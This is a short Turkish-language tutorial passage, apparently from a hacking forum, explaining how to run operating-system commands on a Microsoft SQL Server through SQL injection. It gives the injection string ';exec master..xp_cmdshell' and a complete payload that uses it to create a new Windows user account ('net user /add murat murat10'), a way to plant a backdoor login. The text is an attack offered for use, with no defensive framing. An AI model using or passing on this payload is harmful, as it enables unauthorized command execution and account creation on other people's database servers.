şimdide mssql injection yaparken uzakdan cmdshell
çalıştırmayı gösterecegim.şu gomut ile cmdshelli çalıştırabil
mekteyiz.

;exec master..xp_cmdshell ”–

” bıraktıgım yer size kalan komutların kullanacagınız yer.

mesela en basitinden ” şu kısımın arasına bizim o meşhur MS SQL
password ve user oluşturma gomutumuzu kullanabiliriz.

‘net user /add murat murat10’

toplayacak olursak.

;exec master..xp_cmdshell ‘net user / add murat murat10’–

şeklini alıyor..